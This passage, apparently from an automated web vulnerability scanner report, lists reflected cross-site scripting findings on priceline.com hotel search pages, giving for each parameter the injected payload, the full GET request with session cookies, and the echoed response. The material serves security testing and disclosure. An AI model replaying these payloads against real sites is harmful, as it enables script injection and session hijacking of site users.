Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:12 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=44A50B9931539E5695C62CEF274AD5DF; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 492983


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkInDate" name="checkInDate" size="12" value="10/09/2011edf33"style="x:expression(alert(1))"412a6bf160a3d07c7" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...

4.106. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ace3"style%3d"x%3aexpression(alert(1))"bb7ca47d1b04f0ca3 was submitted in the checkOutDate parameter. This input was echoed as 5ace3"style="x:expression(alert(1))"bb7ca47d1b04f0ca3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F20115ace3"style%3d"x%3aexpression(alert(1))"bb7ca47d1b04f0ca3&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:29 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8895D726B371B688DA9245EF0D3D4980; Path=/hotel
Vary: Accept-Encoding
Content-Length: 40767
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkOutDate" name="checkOutDate" size="12" value="10/16/20115ace3"style="x:expression(alert(1))"bb7ca47d1b04f0ca3" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...

4.107. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the checkOutDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3755"%3balert(1)//8a13c8bc9178965e7 was submitted in the checkOutDate parameter. This input was echoed as d3755";alert(1)//8a13c8bc9178965e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011d3755"%3balert(1)//8a13c8bc9178965e7&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:39 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 492600


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
2c["productID"] = "5";
c2c["wtPageTitle"] = "/hotel/hotelResultsListView_Change";
c2c["pricePoint"] = "1414";
c2c["numRooms"] = "1";
c2c["initialHotelCount"] = "137";
c2c["travelEndDate"] = "10/16/2011d3755";alert(1)//8a13c8bc9178965e7";
c2c["travelStartDate"] = "10/09/2011";
c2c["vid"] = "v2011100300373188ec0127";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...

4.108. http://travela.priceline.com/hotel/newHotelSearch.do [noWait parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the noWait request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d1ec"style%3d"x%3aexpression(alert(1))"0da24a740086c341c was submitted in the noWait parameter. This input was echoed as 4d1ec"style="x:expression(alert(1))"0da24a740086c341c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y4d1ec"style%3d"x%3aexpression(alert(1))"0da24a740086c341c&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:33 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=3D81B065BE9C8AA1609124869823ADD2; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8647
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="noWait" value="Y4d1ec"style="x:expression(alert(1))"0da24a740086c341c"/>
...[SNIP]...

4.109. http://travela.priceline.com/hotel/searchHotels.do [CkInDay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkInDay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c06ed"style%3d"x%3aexpression(alert(1))"68ae18697a7bf990f was submitted in the CkInDay parameter. This input was echoed as c06ed"style="x:expression(alert(1))"68ae18697a7bf990f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04c06ed"style%3d"x%3aexpression(alert(1))"68ae18697a7bf990f&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:44 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a201110030013449b6011592431; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A44&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:44 GMT; Path=/
Set-Cookie: JSESSIONID=F3628F017C20466C613C8A3EA2EFAF49; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkInDay" value="04c06ed"style="x:expression(alert(1))"68ae18697a7bf990f"/>
...[SNIP]...

4.110. http://travela.priceline.com/hotel/searchHotels.do [CkInMonth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkInMonth request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1694"style%3d"x%3aexpression(alert(1))"40f4443c19bf67c12 was submitted in the CkInMonth parameter. This input was echoed as a1694"style="x:expression(alert(1))"40f4443c19bf67c12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10a1694"style%3d"x%3aexpression(alert(1))"40f4443c19bf67c12&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:25 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a201110030013259a3011596815; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A25&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:25 GMT; Path=/
Set-Cookie: JSESSIONID=B10302AAA0649030C8524B189AF10516; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkInMonth" value="10a1694"style="x:expression(alert(1))"40f4443c19bf67c12"/>
...[SNIP]...

4.111. http://travela.priceline.com/hotel/searchHotels.do [CkInYear parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkInYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55907"style%3d"x%3aexpression(alert(1))"7f8076d466081c5c7 was submitted in the CkInYear parameter. This input was echoed as 55907"style="x:expression(alert(1))"7f8076d466081c5c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=201155907"style%3d"x%3aexpression(alert(1))"7f8076d466081c5c7&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:58 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a20111003001358918011562544; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A13%3A58&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:13:58 GMT; Path=/
Set-Cookie: JSESSIONID=8D8F1AFF2B2AAE8852E4E7D598B4408A; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8941
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkInYear" value="201155907"style="x:expression(alert(1))"7f8076d466081c5c7"/>
...[SNIP]...

4.112. http://travela.priceline.com/hotel/searchHotels.do [CkOutDay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkOutDay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8ac"style%3d"x%3aexpression(alert(1))"feb4acd87dd36f29b was submitted in the CkOutDay parameter. This input was echoed as cd8ac"style="x:expression(alert(1))"feb4acd87dd36f29b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07cd8ac"style%3d"x%3aexpression(alert(1))"feb4acd87dd36f29b&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5463010a20111003001441a2c011748102; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A41&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:41 GMT; Path=/
Set-Cookie: JSESSIONID=57CF35F22DAC84A831E4110AC3384F82; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkOutDay" value="07cd8ac"style="x:expression(alert(1))"feb4acd87dd36f29b"/>
...[SNIP]...

4.113. http://travela.priceline.com/hotel/searchHotels.do [CkOutMonth parameter]

